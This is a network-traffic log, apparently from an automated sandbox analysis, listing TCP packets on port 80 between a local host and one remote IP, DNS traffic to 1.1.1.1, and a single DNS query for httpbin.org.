Dec 31, 2024 16:42:26.146120071 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.146152973 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146166086 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146193981 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146198988 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.146207094 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146215916 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.146239996 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.146253109 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.146300077 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146311998 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146358013 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146372080 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146437883 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146449089 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146471024 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146481991 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146503925 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146514893 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146543980 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146589994 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146651983 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146663904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146686077 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146697044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146749973 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146763086 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146784067 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146801949 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146822929 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146835089 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146914959 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146927118 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146958113 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146969080 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147083044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147094965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147105932 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147116899 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147138119 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147150040 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147170067 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147181034 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147201061 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147212029 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.147223949 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148581982 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148605108 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148724079 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148736000 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148775101 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148787022 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148809910 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.148821115 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150402069 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150415897 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150438070 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150449038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150471926 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150484085 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150507927 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150520086 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150566101 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150578976 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150649071 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150703907 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150715113 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150727034 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150774002 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150785923 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150808096 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150819063 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150851965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150863886 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150907993 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150919914 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150942087 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150954008 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.150975943 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151032925 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151048899 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151065111 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151093006 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151119947 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151160955 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151176929 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151192904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151209116 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151238918 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151256084 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151273966 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151290894 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151330948 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151345968 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151360989 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151401043 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151417017 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151432037 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151448011 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151465893 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151493073 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151509047 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151525021 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151540995 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151570082 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151586056 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.151602030 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.153727055 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.153785944 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.158809900 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159153938 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159178972 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159195900 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159214973 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159252882 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159270048 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159287930 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159303904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159359932 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159375906 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159400940 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159418106 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159447908 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159465075 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159481049 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159497976 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159513950 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159529924 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159560919 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159576893 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159594059 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159609079 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159638882 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159653902 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159670115 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159687042 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159703970 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159735918 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159754038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159770012 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159802914 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159820080 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159837008 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159852982 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159868956 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159884930 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159918070 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159934044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159950018 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159965038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.159996986 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160012960 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160028934 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160044909 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160060883 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160077095 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160092115 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160121918 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160137892 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160154104 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160170078 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.160187006 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.161736012 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.161799908 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.166681051 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166709900 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166763067 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166790009 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166816950 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166842937 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166891098 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166918039 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166944981 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.166970968 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167021036 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167047024 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167073011 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167121887 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167149067 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167176008 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167224884 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167252064 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167277098 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167303085 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167349100 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167376041 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167424917 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167453051 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167479038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167505026 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167531013 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167557001 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167582989 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167608976 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167634964 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167660952 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167709112 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167735100 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167762995 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167789936 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167815924 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167840958 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167870045 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167896032 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167922020 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167948008 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167973042 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.167999029 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168025017 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168051004 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168097973 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168126106 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168152094 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168178082 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168205023 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168231010 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.168256998 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.169550896 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.169611931 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.174465895 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174515963 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174542904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174591064 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174618006 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174669981 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174686909 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.174696922 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174745083 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174772978 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174822092 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174849033 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174875021 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174905062 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174952030 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.174978971 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175024986 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175051928 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175098896 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175126076 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175174952 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175200939 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175228119 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175252914 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175304890 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175347090 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175374031 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175400019 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175426960 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175473928 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175499916 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175525904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175558090 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175584078 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175610065 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175635099 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175684929 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175712109 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175738096 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175765038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175790071 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175816059 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175842047 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175868034 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175894022 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175920010 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175967932 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.175995111 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.176021099 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.176045895 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.176073074 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.176099062 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.176124096 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.176151037 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.180969954 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.180999041 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181025028 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181154013 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181180954 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181231022 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181257010 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181307077 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181334019 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181382895 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181408882 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181435108 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181461096 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181507111 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181535006 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181689024 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181715965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181766033 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181792974 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181818962 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181865931 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181891918 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181917906 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181957006 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.181982994 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.182029963 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.182056904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.182082891 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.182109118 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.182136059 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:29.026868105 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:29.067538023 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:29.079931974 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:29.084935904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:29.084985971 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:30.283953905 CET	49736	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:30.288872004 CET	80	49736	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:30.288947105 CET	49736	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:30.289189100 CET	49736	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:30.294027090 CET	80	49736	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:30.927716970 CET	80	49736	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:30.929086924 CET	49736	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:30.934351921 CET	80	49736	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:30.934403896 CET	49736	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:31.637461901 CET	54676	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:31.642268896 CET	53	54676	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:31.642396927 CET	54676	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:31.647200108 CET	53	54676	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:32.103549004 CET	54676	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:32.108588934 CET	53	54676	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:32.108624935 CET	54676	53	192.168.2.4	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 16:42:12.322237968 CET	57360	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:12.322319984 CET	57360	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:12.329225063 CET	53	57360	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:12.329924107 CET	53	57360	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:24.996184111 CET	57363	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:24.996263027 CET	57363	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:25.661195993 CET	53	57363	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:25.674082041 CET	53	57363	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:29.465282917 CET	52643	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:29.465341091 CET	52643	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:42:30.283088923 CET	53	52643	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:30.283118963 CET	53	52643	1.1.1.1	192.168.2.4
Dec 31, 2024 16:42:31.636917114 CET	53	54788	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 16:42:12.322237968 CET	192.168.2.4	1.1.1.1	0xf695	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
